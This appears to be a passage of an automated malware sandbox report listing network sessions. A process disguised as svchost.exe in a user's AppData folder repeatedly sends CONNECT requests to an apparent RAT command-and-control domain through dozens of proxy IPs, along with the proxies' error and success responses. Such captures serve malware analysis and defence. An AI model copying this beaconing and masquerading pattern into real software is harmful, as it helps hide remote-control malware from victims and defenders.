                                                                                    3106192.168.2.559966185.110.190.998043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.746773005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3107192.168.2.559522105.112.140.218808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.791543007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.880172968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3108192.168.2.558392128.199.196.314167243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.795022011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.145828962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3109192.168.2.55996943.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.795231104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3110192.168.2.56003143.134.230.12244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.795912981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3111192.168.2.56003843.134.230.12244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.796824932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3112192.168.2.56004043.134.230.12244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.797489882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3113192.168.2.56004143.134.230.12244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.798840046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3114192.168.2.5583545.44.42.1155838643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.808485985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3115192.168.2.55997391.107.180.2508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.811223030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.119416952 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3116192.168.2.559967103.146.137.5108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.818572998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.658194065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.974163055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378463984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3117192.168.2.55997743.128.146.421567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.840816021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3118192.168.2.559674143.110.232.1778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.852797031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380367994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.502085924 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3119192.168.2.558491142.54.232.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.854381084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3120192.168.2.559602115.244.127.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.859889984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3121192.168.2.55969964.227.108.1821428743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.860100985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.880245924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3122192.168.2.55997882.137.244.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.892904043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3123192.168.2.558171111.206.0.99818143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.897577047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.937114000 CET162INHTTP/1.1 200 Connection Established
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 0
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: eJet/1.4.2
                                                                                    X-Nat-IP: 154.16.105.38


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3124192.168.2.560000104.25.87.428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.906469107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.060961962 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3125192.168.2.560004104.16.195.748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.908251047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.062532902 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3126192.168.2.560019188.114.99.1718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.913336039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.068016052 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3127192.168.2.55977292.204.135.37862343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.919342995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177608967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3128192.168.2.559981194.247.173.17808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.919855118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3129192.168.2.55998027.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.931452036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3130192.168.2.560032172.67.219.608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.945254087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.101953983 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3131192.168.2.559982193.84.89.202844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.957385063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3132192.168.2.558417140.238.198.171445543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.971328974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146054983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3133192.168.2.560064192.154.246.96900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.020340919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3134192.168.2.559996119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
